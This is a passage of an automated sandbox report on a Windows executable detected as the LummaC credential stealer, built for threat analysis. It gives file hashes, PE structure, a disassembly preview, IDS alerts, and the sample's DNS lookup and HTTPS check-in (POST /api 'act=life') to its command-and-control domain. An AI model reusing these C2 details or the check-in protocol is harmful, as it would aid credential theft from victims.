                              file.exeGet hashmaliciousLummaC StealerBrowse
                              • 172.67.162.84
                              file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                              • 172.67.162.84
                              ZjH6H6xqo7.exeGet hashmaliciousLummaCBrowse
                              • 172.67.162.84
                              file.exeGet hashmaliciousLummaC StealerBrowse
                              • 172.67.162.84
                              file.exeGet hashmaliciousLummaCBrowse
                              • 172.67.162.84
                              file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, JasonRAT, LummaC Stealer, Stealc, VidarBrowse
                              • 172.67.162.84

                              Dropped Files

                              No context

                              Created / dropped Files

                              No created / dropped files found

                              Static File Info

                              General

                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Entropy (8bit):7.947024841870626
                              TrID:
                              • Win32 Executable (generic) a (10002005/4) 99.96%
                              • Generic Win/DOS Executable (2004/3) 0.02%
                              • DOS Executable Generic (2002/1) 0.02%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                              File name:file.exe
                              File size:1'867'776 bytes
                              MD5:c7ffd9f68af166bc332ad19be70c3b5c
                              SHA1:e19af1c281e963bdb378dd17b84706c51a87bb19
                              SHA256:0b2957e10a9d6c29a680e112571ea46be5fedeac0ecc6f0097337f40d61a4cb1
                              SHA512:56f5561297df2dfec098f07c5d3d6e922f81fa9de62c99582fd4e45479a3234c6047c8f12baa6f18ba156766bf063515f478435b46380e75f5cad355655b2802
                              SSDEEP:24576:5BI6xI2pdMvYT8/LRuYr/TKG9uvZU+ZCvPOZpB0oBytu+enRN2AeWkAFcWXYUSwF:fVK0GvYT874vZGH+0KqoYz+/1IoCnl
                              TLSH:1C8533E56F8ABFB4CAD0E0300BFF22B73F2D85A50D6151A5A90271F55B33D61876AD02
                              File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...Q<?g..............................I...........@...........................I...........@.................................\...p..

                              File Icon

                              Icon Hash:00928e8e8686b000

                              Static PE Info

                              General

                              Entrypoint:0x89c000
                              Entrypoint Section:.taggant
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                              Time Stamp:0x673F3C51 [Thu Nov 21 13:57:37 2024 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:6
                              OS Version Minor:0
                              File Version Major:6
                              File Version Minor:0
                              Subsystem Version Major:6
                              Subsystem Version Minor:0
                              Import Hash:2eabe9054cad5152567f0699947a2c5b

                              Entrypoint Preview

                              Instruction
                              jmp 00007F9668BF53CAh
                              divps xmm3, dqword ptr [eax+eax]
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              jmp 00007F9668BF73C5h
                              add byte ptr [edx+ecx], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              xor byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              and al, 00h
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              and dword ptr [eax], eax
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              push es
                              add byte ptr [eax], 00000000h
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              adc byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add eax, 0000000Ah
                              add byte ptr [eax], al
                              add byte ptr [eax], dl
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [esi], al
                              or al, byte ptr [eax]
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [esi], al
                              add byte ptr [eax], 00000000h
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              adc byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add al, 0Ah
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              xor byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add al, 00h
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add dword ptr [eax+00000000h], eax
                              add byte ptr [eax], al
                              adc byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add al, 0Ah
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              xor byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              or al, byte ptr [eax]
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              mov cl, 80h
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al

                              Data Directories

                              NameVirtual AddressVirtual Size Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IMPORT0x5805c0x70.idata
                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x570000x2b0.rsrc
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x581f80x8.idata
                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                              Sections

                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                              0x10000x560000x26200606ff50e8267368bfb6e97cba852b6daFalse0.9992699795081967data7.982113095110462IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .rsrc0x570000x2b00x200e39ce63b21796d11090cbfe77a2cd04fFalse0.791015625data6.001086040172281IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .idata 0x580000x10000x200c92ced077364b300efd06b14c70a61dcFalse0.15625data1.1194718105633323IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              0x590000x2a40000x200591c3dac2be47af0609bb0153e587588unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              fwtvsnnj0x2fd0000x19e0000x19e0005eb06bdff4fa27277e4fbaed49712cd9False0.9945599099864131data7.953020845003473IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              vcdokcsv0x49b0000x10000x600b1f36fe4e0fcd94f7064a17da5b58031False0.5729166666666666data4.90685177919293IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .taggant0x49c0000x30000x220011deb9afd46cfdbaa55f9f8e6a3ef22aFalse0.08340992647058823DOS executable (COM)0.9362518713449475IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                              Resources

                              NameRVASizeTypeLanguageCountryZLIB Complexity
                              RT_MANIFEST0x49ad880x256ASCII text, with CRLF line terminators0.5100334448160535

                              Imports

                              DLLImport
                              kernel32.dlllstrcpy

                              Network Behavior

                              Suricata IDS Alerts

                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                              2024-11-24T11:33:27.539212+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849705172.67.162.84443TCP
                              2024-11-24T11:33:28.262223+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.849705172.67.162.84443TCP
                              2024-11-24T11:33:28.262223+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.849705172.67.162.84443TCP
                              2024-11-24T11:33:29.516196+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849706172.67.162.84443TCP

                              Network Port Distribution

                              TCP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Nov 24, 2024 11:33:26.199892998 CET49705443192.168.2.8172.67.162.84
                              Nov 24, 2024 11:33:26.199927092 CET44349705172.67.162.84192.168.2.8
                              Nov 24, 2024 11:33:26.200004101 CET49705443192.168.2.8172.67.162.84
                              Nov 24, 2024 11:33:26.214581966 CET49705443192.168.2.8172.67.162.84
                              Nov 24, 2024 11:33:26.214601040 CET44349705172.67.162.84192.168.2.8
                              Nov 24, 2024 11:33:27.539093971 CET44349705172.67.162.84192.168.2.8
                              Nov 24, 2024 11:33:27.539211988 CET49705443192.168.2.8172.67.162.84
                              Nov 24, 2024 11:33:27.543703079 CET49705443192.168.2.8172.67.162.84
                              Nov 24, 2024 11:33:27.543710947 CET44349705172.67.162.84192.168.2.8
                              Nov 24, 2024 11:33:27.544030905 CET44349705172.67.162.84192.168.2.8
                              Nov 24, 2024 11:33:27.592487097 CET49705443192.168.2.8172.67.162.84
                              Nov 24, 2024 11:33:27.592487097 CET49705443192.168.2.8172.67.162.84
                              Nov 24, 2024 11:33:27.592582941 CET44349705172.67.162.84192.168.2.8
                              Nov 24, 2024 11:33:28.262240887 CET44349705172.67.162.84192.168.2.8
                              Nov 24, 2024 11:33:28.262340069 CET44349705172.67.162.84192.168.2.8
                              Nov 24, 2024 11:33:28.262404919 CET49705443192.168.2.8172.67.162.84
                              Nov 24, 2024 11:33:28.265090942 CET49705443192.168.2.8172.67.162.84
                              Nov 24, 2024 11:33:28.265109062 CET44349705172.67.162.84192.168.2.8
                              Nov 24, 2024 11:33:28.317913055 CET49706443192.168.2.8172.67.162.84
                              Nov 24, 2024 11:33:28.317961931 CET44349706172.67.162.84192.168.2.8
                              Nov 24, 2024 11:33:28.318049908 CET49706443192.168.2.8172.67.162.84
                              Nov 24, 2024 11:33:28.318387032 CET49706443192.168.2.8172.67.162.84
                              Nov 24, 2024 11:33:28.318401098 CET44349706172.67.162.84192.168.2.8
                              Nov 24, 2024 11:33:29.516196012 CET49706443192.168.2.8172.67.162.84

                              UDP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Nov 24, 2024 11:33:25.697555065 CET6025653192.168.2.81.1.1.1
                              Nov 24, 2024 11:33:26.019197941 CET53602561.1.1.1192.168.2.8

                              DNS Queries

                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                              Nov 24, 2024 11:33:25.697555065 CET192.168.2.81.1.1.10x55f0Standard query (0)property-imper.sbsA (IP address)IN (0x0001)false

                              DNS Answers

                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                              Nov 24, 2024 11:33:26.019197941 CET1.1.1.1192.168.2.80x55f0No error (0)property-imper.sbs172.67.162.84A (IP address)IN (0x0001)false
                              Nov 24, 2024 11:33:26.019197941 CET1.1.1.1192.168.2.80x55f0No error (0)property-imper.sbs104.21.33.116A (IP address)IN (0x0001)false

                              HTTP Request Dependency Graph

                              • property-imper.sbs

                              HTTPS Proxied Packets

                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              0192.168.2.849705172.67.162.844431644C:\Users\user\Desktop\file.exe
                              TimestampBytes transferredDirectionData
                              2024-11-24 10:33:27 UTC265OUTPOST /api HTTP/1.1
                              Connection: Keep-Alive
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                              Content-Length: 8
                              Host: property-imper.sbs
                              2024-11-24 10:33:27 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                              Data Ascii: act=life
                              2024-11-24 10:33:28 UTC1023INHTTP/1.1 200 OK
                              Date: Sun, 24 Nov 2024 10:33:28 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: close
                              Set-Cookie: PHPSESSID=i0u5nq0e708305nu3leec7mi5p; expires=Thu, 20-Mar-2025 04:20:07 GMT; Max-Age=9999999; path=/
                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                              Cache-Control: no-store, no-cache, must-revalidate
                              Pragma: no-cache
                              cf-cache-status: DYNAMIC
                              vary: accept-encoding
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Kh8qZpGeZo5xHnpU%2F%2Fe4yzzpRQ5h4UGcpGaiu%2BKoa3fm43I5NSoRbZ4NHcrYl37oWcH9inI%2B7MDERTR%2BfjtCdjJxXYVhNmY%2B8tTk2ltYigUp%2FiOYHYGIZKW8%2BqShpgXkqxMLSWQ%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8e78bdacdb260c76-EWR
                              alt-svc: h3=":443"; ma=86400
                              server-timing: cfL4;desc="?proto=TCP&rtt=1629&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=909&delivery_rate=1784841&cwnd=138&unsent_bytes=0&cid=8b6282ff3843ad97&ts=735&x=0"
                              2024-11-24 10:33:28 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                              Data Ascii: 2ok
                              2024-11-24 10:33:28 UTC5INData Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Statistics

                              CPU Usage

                              Click to jump to process

                              Memory Usage

                              Click to jump to process

                              High Level Behavior Distribution

                              Click to dive into process behavior distribution

                              System Behavior

                              General

                              Target ID:0
                              Start time:05:33:22
                              Start date:24/11/2024
                              Path:C:\Users\user\Desktop\file.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\file.exe"
                              Imagebase:0xfe0000
                              File size:1'867'776 bytes
                              MD5 hash:C7FFD9F68AF166BC332AD19BE70C3B5C
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:low
                              Has exited:true

                              Disassembly

                              Reset < >

                                Execution Graph

                                Execution Coverage:2.6%
                                Dynamic/Decrypted Code Coverage:0%
                                Signature Coverage:65.8%
                                Total number of Nodes:231
                                Total number of Limit Nodes:15
                                execution_graph 6736 1001960 6737 10019d8 6736->6737 6742 ff9530 6737->6742 6739 1001a84 6740 ff9530 LdrInitializeThunk 6739->6740 6741 1001b29 6740->6741 6743 ff9560 6742->6743 6754 1020480 6743->6754 6745 ff974b 6764 10207b0 6745->6764 6746 ff9756 6751 ff9783 6746->6751 6753 ff96ca 6746->6753 6758 1020880 6746->6758 6747 ff962e 6747->6745 6747->6746 6748 1020480 LdrInitializeThunk 6747->6748 6747->6751 6747->6753 6748->6747 6751->6753 6768 101df70 LdrInitializeThunk 6751->6768 6753->6739 6753->6753 6755 10204a0 6754->6755 6756 10205be 6755->6756 6769 101df70 LdrInitializeThunk 6755->6769 6756->6747 6760 10208b0 6758->6760 6759 10209ae 6759->6751 6762 10208fe 6760->6762 6770 101df70 LdrInitializeThunk 6760->6770 6762->6759 6771 101df70 LdrInitializeThunk 6762->6771 6765 10207e0 6764->6765 6766 102082e 6765->6766 6772 101df70 LdrInitializeThunk 6765->6772 6766->6746 6768->6753 6769->6756 6770->6762 6771->6759 6772->6766 6773 101b7e0 6774 101b800 6773->6774 6774->6774 6775 101b83f RtlAllocateHeap 6774->6775 6999 101bce0 7000 101bd5a 6999->7000 7001 101bcf2 6999->7001 7001->7000 7003 101bd52 7001->7003 7007 101df70 LdrInitializeThunk 7001->7007 7004 101bede 7003->7004 7008 101df70 LdrInitializeThunk 7003->7008 7004->7000 7009 101df70 LdrInitializeThunk 7004->7009 7007->7003 7008->7004 7009->7000 7028 1020a00 7029 1020a30 7028->7029 7029->7029 7031 1020a7e 7029->7031 7034 101df70 LdrInitializeThunk 7029->7034 7032 1020b2e 7031->7032 7035 101df70 LdrInitializeThunk 7031->7035 7034->7031 7035->7032 7041 10202c0 7043 10202e0 7041->7043 7042 102041e 7043->7042 7045 101df70 LdrInitializeThunk 7043->7045 7045->7042 6809 fee0d8 6810 fee100 6809->6810 6812 fee16e 6810->6812 6825 101df70 LdrInitializeThunk 6810->6825 6814 fee22e 6812->6814 6826 101df70 LdrInitializeThunk 6812->6826 6827 1005e90 6814->6827 6816 fee29d 6835 1006190 6816->6835 6818 fee2bd 6845 1007e20 6818->6845 6822 fee2e6 6865 1008c90 6822->6865 6824 fee2ef 6825->6812 6826->6814 6828 1005f30 6827->6828 6828->6828 6829 10060b5 6828->6829 6830 1006026 6828->6830 6831 1006020 6828->6831 6874 1020f60 6828->6874 6834 1001790 2 API calls 6829->6834 6868 1001790 6830->6868 6831->6816 6834->6831 6836 100619e 6835->6836 6907 1020b70 6836->6907 6838 10060b5 6844 1001790 2 API calls 6838->6844 6839 1006026 6843 1001790 2 API calls 6839->6843 6840 1020f60 2 API calls 6842 1005fe0 6840->6842 6841 1006020 6841->6818 6842->6838 6842->6839 6842->6840 6842->6841 6843->6838 6844->6841 6846 10080a0 6845->6846 6848 1007e4c 6845->6848 6853 10080d7 6845->6853 6855 fee2dd 6845->6855 6912 101ded0 6846->6912 6848->6846 6848->6848 6849 1020f60 2 API calls 6848->6849 6850 1020b70 LdrInitializeThunk 6848->6850 6848->6853 6848->6855 6849->6848 6850->6848 6851 1020b70 LdrInitializeThunk 6851->6853 6853->6851 6853->6855 6856 101df70 LdrInitializeThunk 6853->6856 6916 1020c80 6853->6916 6924 1021580 6853->6924 6857 1008770 6855->6857 6856->6853 6858 10087a0 6857->6858 6859 100882e 6858->6859 6936 101df70 LdrInitializeThunk 6858->6936 6860 101b7e0 RtlAllocateHeap 6859->6860 6864 100895e 6859->6864 6862 10088b1 6860->6862 6862->6864 6937 101df70 LdrInitializeThunk 6862->6937 6864->6822 6938 1008cb0 6865->6938 6867 1008c99 6867->6824 6873 10017a0 6868->6873 6869 100183e 6869->6829 6871 1001861 6871->6869 6886 1003d70 6871->6886 6873->6869 6873->6871 6882 1020610 6873->6882 6876 1020f90 6874->6876 6875 1020fde 6877 101b7e0 RtlAllocateHeap 6875->6877 6881 10210ae 6875->6881 6876->6875 6905 101df70 LdrInitializeThunk 6876->6905 6879 102101f 6877->6879 6879->6881 6906 101df70 LdrInitializeThunk 6879->6906 6881->6828 6881->6881 6883 1020630 6882->6883 6884 102075e 6883->6884 6898 101df70 LdrInitializeThunk 6883->6898 6884->6871 6887 1020480 LdrInitializeThunk 6886->6887 6888 1003db0 6887->6888 6893 10044c3 6888->6893 6899 101b7e0 6888->6899 6891 1003dee 6897 1003e7c 6891->6897 6902 101df70 LdrInitializeThunk 6891->6902 6892 101b7e0 RtlAllocateHeap 6892->6897 6893->6869 6894 1004427 6894->6893 6904 101df70 LdrInitializeThunk 6894->6904 6897->6892 6897->6894 6903 101df70 LdrInitializeThunk 6897->6903 6898->6884 6900 101b800 6899->6900 6900->6900 6901 101b83f RtlAllocateHeap 6900->6901 6901->6891 6902->6891 6903->6897 6904->6894 6905->6875 6906->6881 6909 1020b90 6907->6909 6908 1020c4f 6908->6842 6909->6908 6911 101df70 LdrInitializeThunk 6909->6911 6911->6908 6913 101df3e 6912->6913 6915 101deea 6912->6915 6914 101b7e0 RtlAllocateHeap 6913->6914 6914->6915 6915->6853 6917 1020cb0 6916->6917 6918 1020cfe 6917->6918 6932 101df70 LdrInitializeThunk 6917->6932 6920 101b7e0 RtlAllocateHeap 6918->6920 6923 1020e0f 6918->6923 6921 1020d8b 6920->6921 6921->6923 6933 101df70 LdrInitializeThunk 6921->6933 6923->6853 6925 1021591 6924->6925 6926 102163e 6925->6926 6934 101df70 LdrInitializeThunk 6925->6934 6928 101b7e0 RtlAllocateHeap 6926->6928 6930 10217de 6926->6930 6929 10216ae 6928->6929 6929->6930 6935 101df70 LdrInitializeThunk 6929->6935 6930->6853 6932->6918 6933->6923 6934->6926 6935->6930 6936->6859 6937->6864 6939 1008d10 6938->6939 6939->6939 6948 101b8e0 6939->6948 6941 1008d6d 6941->6867 6943 1008d45 6943->6941 6946 1008e66 6943->6946 6956 101bb20 6943->6956 6960 101c040 6943->6960 6947 1008ece 6946->6947 6968 101bfa0 6946->6968 6947->6867 6949 101b900 6948->6949 6950 101b93e 6949->6950 6972 101df70 LdrInitializeThunk 6949->6972 6952 101b7e0 RtlAllocateHeap 6950->6952 6955 101ba1f 6950->6955 6953 101b9c5 6952->6953 6953->6955 6973 101df70 LdrInitializeThunk 6953->6973 6955->6943 6957 101bb31 6956->6957 6958 101bbce 6956->6958 6957->6958 6974 101df70 LdrInitializeThunk 6957->6974 6958->6943 6962 101c090 6960->6962 6961 101c73e 6961->6943 6967 101c0d8 6962->6967 6975 101df70 LdrInitializeThunk 6962->6975 6964 101c6cf 6964->6961 6976 101df70 LdrInitializeThunk 6964->6976 6966 101df70 LdrInitializeThunk 6966->6967 6967->6961 6967->6964 6967->6966 6967->6967 6970 101bfc0 6968->6970 6969 101c00e 6969->6946 6970->6969 6977 101df70 LdrInitializeThunk 6970->6977 6972->6950 6973->6955 6974->6958 6975->6967 6976->6961 6977->6969 6792 feceb3 CoInitializeSecurity 6793 fed7d3 CoUninitialize 6794 fed7da 6793->6794 6986 fedc33 6988 fedcd0 6986->6988 6987 fedd4e 6988->6987 6990 101df70 LdrInitializeThunk 6988->6990 6990->6987 6996 ff9130 6997 101b8e0 2 API calls 6996->6997 6998 ff9158 6997->6998 7046 ffdb30 7047 ffdb70 7046->7047 7047->7047 7048 feb210 RtlAllocateHeap 7047->7048 7049 ffdda8 7048->7049 6978 fee88f 6979 fee88e 6978->6979 6979->6978 6981 fee89c 6979->6981 6984 101df70 LdrInitializeThunk 6979->6984 6983 fee948 6981->6983 6985 101df70 LdrInitializeThunk 6981->6985 6984->6981 6985->6983 7050 fec32b 7051 101ded0 RtlAllocateHeap 7050->7051 7052 fec338 7051->7052 6776 fecf05 6777 fecf20 6776->6777 6782 1019030 6777->6782 6779 fecf7a 6780 1019030 5 API calls 6779->6780 6781 fed3ca 6780->6781 6783 1019090 6782->6783 6783->6783 6785 10191b1 SysAllocString 6783->6785 6787 101966a 6783->6787 6784 101969c GetVolumeInformationW 6790 10196ba 6784->6790 6786 10191df 6785->6786 6786->6787 6788 10191ea CoSetProxyBlanket 6786->6788 6787->6784 6788->6787 6791 101920a 6788->6791 6789 1019658 SysFreeString SysFreeString 6789->6787 6790->6779 6791->6789 6795 fe89a0 6799 fe89af 6795->6799 6796 fe8cb3 ExitProcess 6797 fe8cae 6804 101deb0 6797->6804 6799->6796 6799->6797 6803 fece80 CoInitializeEx 6799->6803 6807 101f460 6804->6807 6806 101deb5 FreeLibrary 6806->6796 6808 101f469 6807->6808 6808->6806 7015 fea2e1 7016 fea3d0 7015->7016 7016->7016 7019 feb210 7016->7019 7018 fea3fe 7022 feb2a0 7019->7022 7020 101ded0 RtlAllocateHeap 7020->7022 7021 feb2d6 7021->7018 7021->7021 7022->7020 7022->7021

                                Executed Functions

                                Function 01019030 Relevance: 21.6, APIs: 5, Strings: 7, Instructions: 629memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 0 1019030-1019089 1 1019090-10190c6 0->1 1->1 2 10190c8-10190e4 1->2 4 10190f1-101913f 2->4 5 10190e6 2->5 7 1019145-1019177 4->7 8 101968c-10196b8 call 101f9a0 GetVolumeInformationW 4->8 5->4 9 1019180-10191af 7->9 13 10196ba 8->13 14 10196bc-10196df call 1000650 8->14 9->9 12 10191b1-10191e4 SysAllocString 9->12 18 1019674-1019688 12->18 19 10191ea-1019204 CoSetProxyBlanket 12->19 13->14 20 10196e0-10196e8 14->20 18->8 21 101966a-1019670 19->21 22 101920a-1019225 19->22 20->20 23 10196ea-10196ec 20->23 21->18 25 1019230-1019262 22->25 26 10196fe-101972d call 1000650 23->26 27 10196ee-10196fb call fe8330 23->27 25->25 28 1019264-10192df 25->28 36 1019730-1019738 26->36 27->26 35 10192e0-101930b 28->35 35->35 37 101930d-101933d 35->37 36->36 38 101973a-101973c 36->38 49 1019343-1019365 37->49 50 1019658-1019668 SysFreeString * 2 37->50 39 101974e-101977d call 1000650 38->39 40 101973e-101974b call fe8330 38->40 46 1019780-1019788 39->46 40->39 46->46 48 101978a-101978c 46->48 51 101979e-10197cb call 1000650 48->51 52 101978e-101979b call fe8330 48->52 57 101964b-1019655 49->57 58 101936b-101936e 49->58 50->21 61 10197d0-10197d8 51->61 52->51 57->50 58->57 60 1019374-1019379 58->60 60->57 63 101937f-10193cf 60->63 61->61 64 10197da-10197dc 61->64 69 10193d0-1019416 63->69 65 10197ee-10197f5 64->65 66 10197de-10197eb call fe8330 64->66 66->65 69->69 71 1019418-101942d 69->71 72 1019431-1019433 71->72 73 1019636-1019647 72->73 74 1019439-101943f 72->74 73->57 74->73 75 1019445-1019452 74->75 77 1019454-1019459 75->77 78 101948d 75->78 79 101946c-1019470 77->79 80 101948f-10194b7 call fe82b0 78->80 83 1019460 79->83 84 1019472-101947b 79->84 89 10195e8-10195f9 80->89 90 10194bd-10194cb 80->90 86 1019461-101946a 83->86 87 1019482-1019486 84->87 88 101947d-1019480 84->88 86->79 86->80 87->86 91 1019488-101948b 87->91 88->86 93 1019600-101960c 89->93 94 10195fb 89->94 90->89 92 10194d1-10194d5 90->92 91->86 95 10194e0-10194ea 92->95 96 1019613-1019633 call fe82e0 call fe82c0 93->96 97 101960e 93->97 94->93 98 1019500-1019506 95->98 99 10194ec-10194f1 95->99 96->73 97->96 102 1019525-1019533 98->102 103 1019508-101950b 98->103 101 1019590-1019596 99->101 109 1019598-101959e 101->109 106 1019535-1019538 102->106 107 10195aa-10195b3 102->107 103->102 105 101950d-1019523 103->105 105->101 106->107 112 101953a-1019581 106->112 110 10195b5-10195b7 107->110 111 10195b9-10195bc 107->111 109->89 114 10195a0-10195a2 109->114 110->109 115 10195e4-10195e6 111->115 116 10195be-10195e2 111->116 112->101 114->95 117 10195a8 114->117 115->101 116->101 117->89
                                APIs
                                • SysAllocString.OLEAUT32(13C511C2), ref: 010191B7
                                • CoSetProxyBlanket.COMBASE(0000FDFC,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 010191FC
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1575029298.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                • Associated: 00000000.00000002.1575005263.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575029298.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575097809.0000000001037000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000011C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.000000000129C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000012C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000012DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575755028.00000000012DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1576095665.000000000147B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1576121299.000000000147C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                Similarity
                                • API ID: AllocBlanketProxyString
                                • String ID: =3$C$E!q#$E!q#$Lgfe$\$IK
                                • API String ID: 900851650-4011188741
                                • Opcode ID: e9803d5c3696f40e31feca602a8d71973297761d77ffc7e4e3c8f050647ab9da
                                • Instruction ID: 033e97e0518c8e4a6aa89581475c11107b2e856b770e8e4b5aecd2c92c889fed
                                • Opcode Fuzzy Hash: e9803d5c3696f40e31feca602a8d71973297761d77ffc7e4e3c8f050647ab9da
                                • Instruction Fuzzy Hash: 4B2230B19083019BE320CF24CC91B6BBBE6FF85358F148A1CE5D99B285D779E505CB92
